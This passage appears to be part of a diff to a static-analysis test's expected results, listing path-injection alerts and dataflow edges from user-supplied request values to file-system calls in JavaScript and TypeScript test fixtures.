| path | normalizedPaths.js:82:14:82:27 | req.query.path | normalizedPaths.js:90:31:90:34 | path | This path depends on a $@. | normalizedPaths.js:82:14:82:27 | req.query.path | user-provided value | +| normalizedPaths.js:99:29:99:32 | path | normalizedPaths.js:94:35:94:48 | req.query.path | normalizedPaths.js:99:29:99:32 | path | This path depends on a $@. 
| normalizedPaths.js:94:35:94:48 | req.query.path | user-provided value | +| normalizedPaths.js:119:19:119:22 | path | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:119:19:119:22 | path | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | +| normalizedPaths.js:120:19:120:53 | pathMod ... .html') | normalizedPaths.js:117:30:117:43 | req.query.path | normalizedPaths.js:120:19:120:53 | pathMod ... .html') | This path depends on a $@. | normalizedPaths.js:117:30:117:43 | req.query.path | user-provided value | +| normalizedPaths.js:135:21:135:24 | path | normalizedPaths.js:130:35:130:48 | req.query.path | normalizedPaths.js:135:21:135:24 | path | This path depends on a $@. | normalizedPaths.js:130:35:130:48 | req.query.path | user-provided value | +| normalizedPaths.js:144:21:144:24 | path | normalizedPaths.js:139:48:139:61 | req.query.path | normalizedPaths.js:144:21:144:24 | path | This path depends on a $@. | normalizedPaths.js:139:48:139:61 | req.query.path | user-provided value | +| normalizedPaths.js:151:21:151:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:151:21:151:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | +| normalizedPaths.js:153:21:153:24 | path | normalizedPaths.js:148:44:148:57 | req.query.path | normalizedPaths.js:153:21:153:24 | path | This path depends on a $@. | normalizedPaths.js:148:44:148:57 | req.query.path | user-provided value | +| normalizedPaths.js:165:19:165:22 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:165:19:165:22 | path | This path depends on a $@. | normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | +| normalizedPaths.js:170:21:170:24 | path | normalizedPaths.js:160:35:160:48 | req.query.path | normalizedPaths.js:170:21:170:24 | path | This path depends on a $@. 
| normalizedPaths.js:160:35:160:48 | req.query.path | user-provided value | +| normalizedPaths.js:184:19:184:22 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:184:19:184:22 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:187:21:187:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:187:21:187:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:189:21:189:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:189:21:189:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:192:21:192:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:192:21:192:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:194:21:194:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:194:21:194:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:199:21:199:24 | path | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:199:21:199:24 | path | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:205:21:205:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:205:21:205:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:208:21:208:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:208:21:208:34 | normalizedPath | This path depends on a $@. 
| normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:210:21:210:34 | normalizedPath | normalizedPaths.js:174:14:174:27 | req.query.path | normalizedPaths.js:210:21:210:34 | normalizedPath | This path depends on a $@. | normalizedPaths.js:174:14:174:27 | req.query.path | user-provided value | +| normalizedPaths.js:222:21:222:24 | path | normalizedPaths.js:214:35:214:48 | req.query.path | normalizedPaths.js:222:21:222:24 | path | This path depends on a $@. | normalizedPaths.js:214:35:214:48 | req.query.path | user-provided value | +| normalizedPaths.js:228:21:228:24 | path | normalizedPaths.js:226:35:226:48 | req.query.path | normalizedPaths.js:228:21:228:24 | path | This path depends on a $@. | normalizedPaths.js:226:35:226:48 | req.query.path | user-provided value | +| normalizedPaths.js:238:19:238:22 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:238:19:238:22 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | +| normalizedPaths.js:245:21:245:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:245:21:245:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | +| normalizedPaths.js:250:21:250:24 | path | normalizedPaths.js:236:33:236:46 | req.query.path | normalizedPaths.js:250:21:250:24 | path | This path depends on a $@. | normalizedPaths.js:236:33:236:46 | req.query.path | user-provided value | +| normalizedPaths.js:256:19:256:22 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:256:19:256:22 | path | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:262:21:262:24 | path | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:262:21:262:24 | path | This path depends on a $@. 
| normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:270:21:270:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:270:21:270:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:278:21:278:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:278:21:278:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:286:21:286:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:286:21:286:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:296:21:296:27 | newpath | normalizedPaths.js:254:33:254:46 | req.query.path | normalizedPaths.js:296:21:296:27 | newpath | This path depends on a $@. | normalizedPaths.js:254:33:254:46 | req.query.path | user-provided value | +| normalizedPaths.js:304:18:304:21 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:304:18:304:21 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:309:19:309:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:309:19:309:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:313:19:313:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:313:19:313:22 | path | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:316:19:316:22 | path | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:316:19:316:22 | path | This path depends on a $@. 
| normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:325:19:325:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:325:19:325:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:332:19:332:32 | normalizedPath | normalizedPaths.js:303:13:303:26 | req.query.path | normalizedPaths.js:332:19:332:32 | normalizedPath | This path depends on a $@. | normalizedPaths.js:303:13:303:26 | req.query.path | user-provided value | +| normalizedPaths.js:341:18:341:21 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:341:18:341:21 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | +| normalizedPaths.js:346:19:346:22 | path | normalizedPaths.js:339:32:339:45 | req.query.path | normalizedPaths.js:346:19:346:22 | path | This path depends on a $@. | normalizedPaths.js:339:32:339:45 | req.query.path | user-provided value | +| normalizedPaths.js:356:19:356:22 | path | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:356:19:356:22 | path | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | +| normalizedPaths.js:363:21:363:31 | requestPath | normalizedPaths.js:354:14:354:27 | req.query.path | normalizedPaths.js:363:21:363:31 | requestPath | This path depends on a $@. | normalizedPaths.js:354:14:354:27 | req.query.path | user-provided value | +| normalizedPaths.js:379:19:379:22 | path | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:379:19:379:22 | path | This path depends on a $@. 
| normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | +| normalizedPaths.js:381:19:381:29 | slash(path) | normalizedPaths.js:377:14:377:27 | req.query.path | normalizedPaths.js:381:19:381:29 | slash(path) | This path depends on a $@. | normalizedPaths.js:377:14:377:27 | req.query.path | user-provided value | +| normalizedPaths.js:388:19:388:22 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:388:19:388:22 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | +| normalizedPaths.js:399:21:399:24 | path | normalizedPaths.js:385:35:385:45 | req.query.x | normalizedPaths.js:399:21:399:24 | path | This path depends on a $@. | normalizedPaths.js:385:35:385:45 | req.query.x | user-provided value | +| normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | normalizedPaths.js:407:45:407:55 | req.query.x | normalizedPaths.js:407:19:407:67 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:407:45:407:55 | req.query.x | user-provided value | +| normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | normalizedPaths.js:408:38:408:48 | req.query.x | normalizedPaths.js:408:19:408:60 | pathMod ... t('/')) | This path depends on a $@. | normalizedPaths.js:408:38:408:48 | req.query.x | user-provided value | +| normalizedPaths.js:415:19:415:22 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:415:19:415:22 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | +| normalizedPaths.js:426:21:426:24 | path | normalizedPaths.js:412:35:412:45 | req.query.x | normalizedPaths.js:426:21:426:24 | path | This path depends on a $@. | normalizedPaths.js:412:35:412:45 | req.query.x | user-provided value | +| other-fs-libraries.js:11:19:11:22 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:11:19:11:22 | path | This path depends on a $@. 
| other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:12:27:12:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:12:27:12:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:13:24:13:27 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:13:24:13:27 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:14:27:14:30 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:14:27:14:30 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:16:34:16:37 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:16:34:16:37 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:17:35:17:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:17:35:17:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:19:56:19:59 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:19:56:19:59 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:24:35:24:38 | path | other-fs-libraries.js:9:24:9:30 | req.url | other-fs-libraries.js:24:35:24:38 | path | This path depends on a $@. | other-fs-libraries.js:9:24:9:30 | req.url | user-provided value | +| other-fs-libraries.js:40:35:40:38 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:40:35:40:38 | path | This path depends on a $@. 
| other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | +| other-fs-libraries.js:41:50:41:53 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:41:50:41:53 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | +| other-fs-libraries.js:42:53:42:56 | path | other-fs-libraries.js:38:24:38:30 | req.url | other-fs-libraries.js:42:53:42:56 | path | This path depends on a $@. | other-fs-libraries.js:38:24:38:30 | req.url | user-provided value | +| other-fs-libraries.js:51:19:51:22 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:51:19:51:22 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:52:24:52:27 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:52:24:52:27 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:54:36:54:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:54:36:54:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:55:36:55:39 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:55:36:55:39 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:57:46:57:49 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:57:46:57:49 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:59:39:59:42 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:59:39:59:42 | path | This path depends on a $@. 
| other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:62:43:62:46 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:62:43:62:46 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:63:51:63:54 | path | other-fs-libraries.js:49:24:49:30 | req.url | other-fs-libraries.js:63:51:63:54 | path | This path depends on a $@. | other-fs-libraries.js:49:24:49:30 | req.url | user-provided value | +| other-fs-libraries.js:70:19:70:22 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:70:19:70:22 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:71:10:71:13 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:71:10:71:13 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:72:15:72:18 | path | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:72:15:72:18 | path | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:76:19:76:19 | x | other-fs-libraries.js:68:24:68:30 | req.url | other-fs-libraries.js:76:19:76:19 | x | This path depends on a $@. | other-fs-libraries.js:68:24:68:30 | req.url | user-provided value | +| other-fs-libraries.js:83:16:83:19 | path | other-fs-libraries.js:81:24:81:30 | req.url | other-fs-libraries.js:83:16:83:19 | path | This path depends on a $@. | other-fs-libraries.js:81:24:81:30 | req.url | user-provided value | +| prettier.js:7:28:7:28 | p | prettier.js:6:13:6:13 | p | prettier.js:7:28:7:28 | p | This path depends on a $@. | prettier.js:6:13:6:13 | p | user-provided value | +| prettier.js:11:44:11:44 | p | prettier.js:6:13:6:13 | p | prettier.js:11:44:11:44 | p | This path depends on a $@. 
| prettier.js:6:13:6:13 | p | user-provided value | +| pupeteer.js:9:28:9:34 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:9:28:9:34 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | +| pupeteer.js:13:37:13:43 | tainted | pupeteer.js:5:28:5:53 | parseTo ... t).name | pupeteer.js:13:37:13:43 | tainted | This path depends on a $@. | pupeteer.js:5:28:5:53 | parseTo ... t).name | user-provided value | +| sharedlib-repro.js:22:18:22:25 | filepath | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | sharedlib-repro.js:22:18:22:25 | filepath | This path depends on a $@. | sharedlib-repro.js:13:22:13:43 | req.par ... spaceId | user-provided value | +| tainted-access-paths.js:8:19:8:22 | path | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:8:19:8:22 | path | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:12:19:12:25 | obj.sub | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:12:19:12:25 | obj.sub | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:26:19:26:26 | obj.sub3 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:26:19:26:26 | obj.sub3 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:29:21:29:28 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:29:21:29:28 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:30:23:30:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:30:23:30:30 | obj.sub4 | This path depends on a $@. 
| tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:31:23:31:30 | obj.sub4 | tainted-access-paths.js:6:24:6:30 | req.url | tainted-access-paths.js:31:23:31:30 | obj.sub4 | This path depends on a $@. | tainted-access-paths.js:6:24:6:30 | req.url | user-provided value | +| tainted-access-paths.js:40:23:40:26 | path | tainted-access-paths.js:39:24:39:30 | req.url | tainted-access-paths.js:40:23:40:26 | path | This path depends on a $@. | tainted-access-paths.js:39:24:39:30 | req.url | user-provided value | +| tainted-access-paths.js:49:10:49:13 | path | tainted-access-paths.js:48:24:48:30 | req.url | tainted-access-paths.js:49:10:49:13 | path | This path depends on a $@. | tainted-access-paths.js:48:24:48:30 | req.url | user-provided value | +| tainted-promise-steps.js:11:19:11:35 | await pathPromise | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:11:19:11:35 | await pathPromise | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-promise-steps.js:12:44:12:47 | path | tainted-promise-steps.js:6:24:6:30 | req.url | tainted-promise-steps.js:12:44:12:47 | path | This path depends on a $@. | tainted-promise-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | tainted-require.js:6:19:6:37 | req.param("module") | This path depends on a $@. | tainted-require.js:6:19:6:37 | req.param("module") | user-provided value | +| tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | tainted-require.js:11:29:11:47 | req.param("module") | This path depends on a $@. 
| tainted-require.js:11:29:11:47 | req.param("module") | user-provided value | +| tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | tainted-require.js:13:11:13:29 | req.param("module") | This path depends on a $@. | tainted-require.js:13:11:13:29 | req.param("module") | user-provided value | +| tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:7:16:7:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | This path depends on a $@. | tainted-sendFile.js:8:16:8:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | tainted-sendFile.js:15:43:15:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:15:43:15:58 | req.param("dir") | user-provided value | +| tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | tainted-sendFile.js:21:37:21:48 | req.params.x | tainted-sendFile.js:21:16:21:49 | path.re ... rams.x) | This path depends on a $@. | tainted-sendFile.js:21:37:21:48 | req.params.x | user-provided value | +| tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | tainted-sendFile.js:22:34:22:45 | req.params.x | tainted-sendFile.js:22:16:22:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:22:34:22:45 | req.params.x | user-provided value | +| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | tainted-sendFile.js:26:16:26:33 | req.param("gimme") | This path depends on a $@. 
| tainted-sendFile.js:26:16:26:33 | req.param("gimme") | user-provided value | +| tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | tainted-sendFile.js:28:37:28:48 | req.params.x | tainted-sendFile.js:28:16:28:48 | homeDir ... arams.x | This path depends on a $@. | tainted-sendFile.js:28:37:28:48 | req.params.x | user-provided value | +| tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | tainted-sendFile.js:30:34:30:45 | req.params.x | tainted-sendFile.js:30:16:30:46 | path.jo ... rams.x) | This path depends on a $@. | tainted-sendFile.js:30:34:30:45 | req.params.x | user-provided value | +| tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | tainted-sendFile.js:32:43:32:58 | req.param("dir") | This path depends on a $@. | tainted-sendFile.js:32:43:32:58 | req.param("dir") | user-provided value | +| tainted-string-steps.js:8:18:8:34 | path.substring(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:8:18:8:34 | path.substring(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:9:18:9:37 | path.substring(0, i) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:10:18:10:31 | path.substr(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:10:18:10:31 | path.substr(4) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:11:18:11:30 | path.slice(4) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:11:18:11:30 | path.slice(4) | This path depends on a $@. 
| tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:13:18:13:37 | path.concat(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:14:18:14:37 | unknown.concat(path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:15:18:15:46 | unknown ... , path) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:15:18:15:46 | unknown ... , path) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:17:18:17:28 | path.trim() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:17:18:17:28 | path.trim() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:22:18:22:35 | path.split('/')[i] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:23:18:23:36 | path.split(/\\//)[i] | This path depends on a $@. 
| tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:24:18:24:35 | path.split("?")[0] | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:26:18:26:45 | path.sp ... hatever | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| tainted-string-steps.js:27:18:27:36 | path.split(unknown) | tainted-string-steps.js:6:24:6:30 | req.url | tainted-string-steps.js:27:18:27:36 | path.split(unknown) | This path depends on a $@. | tainted-string-steps.js:6:24:6:30 | req.url | user-provided value | +| torrents.js:7:25:7:27 | loc | torrents.js:5:13:5:38 | parseTo ... t).name | torrents.js:7:25:7:27 | loc | This path depends on a $@. | torrents.js:5:13:5:38 | parseTo ... t).name | user-provided value | +| typescript.ts:11:29:11:32 | path | typescript.ts:9:24:9:30 | req.url | typescript.ts:11:29:11:32 | path | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:20:39:20:43 | path3 | typescript.ts:9:24:9:30 | req.url | typescript.ts:20:39:20:43 | path3 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:23:39:23:43 | path4 | typescript.ts:9:24:9:30 | req.url | typescript.ts:23:39:23:43 | path4 | This path depends on a $@. | typescript.ts:9:24:9:30 | req.url | user-provided value | +| typescript.ts:31:29:31:33 | path6 | typescript.ts:9:24:9:30 | req.url | typescript.ts:31:29:31:33 | path6 | This path depends on a $@. 
| typescript.ts:9:24:9:30 | req.url | user-provided value | +| views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | views.js:1:43:1:55 | req.params[0] | This path depends on a $@. | views.js:1:43:1:55 | req.params[0] | user-provided value | edges -| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:10:41:10:44 | path | provenance | | +| TaintedPath-es6.js:7:7:7:44 | path | TaintedPath-es6.js:9:41:9:44 | path | provenance | | | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | provenance | Config | | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | provenance | Config | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | TaintedPath-es6.js:7:7:7:44 | path | provenance | | | TaintedPath-es6.js:7:20:7:26 | req.url | TaintedPath-es6.js:7:14:7:33 | parse(req.url, true) | provenance | Config | -| TaintedPath-es6.js:10:41:10:44 | path | TaintedPath-es6.js:10:26:10:45 | join("public", path) | provenance | Config | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:12:29:12:32 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:15:45:15:48 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:18:33:18:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:21:33:21:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:24:33:24:36 | path | provenance | | -| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:33:31:33:34 | path | provenance | | +| TaintedPath-es6.js:9:41:9:44 | path | TaintedPath-es6.js:9:26:9:45 | join("public", path) | provenance | Config | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:11:29:11:32 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:13:45:13:48 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | TaintedPath.js:16:33:16:36 | path | provenance | | +| TaintedPath.js:9:7:9:48 | path | 
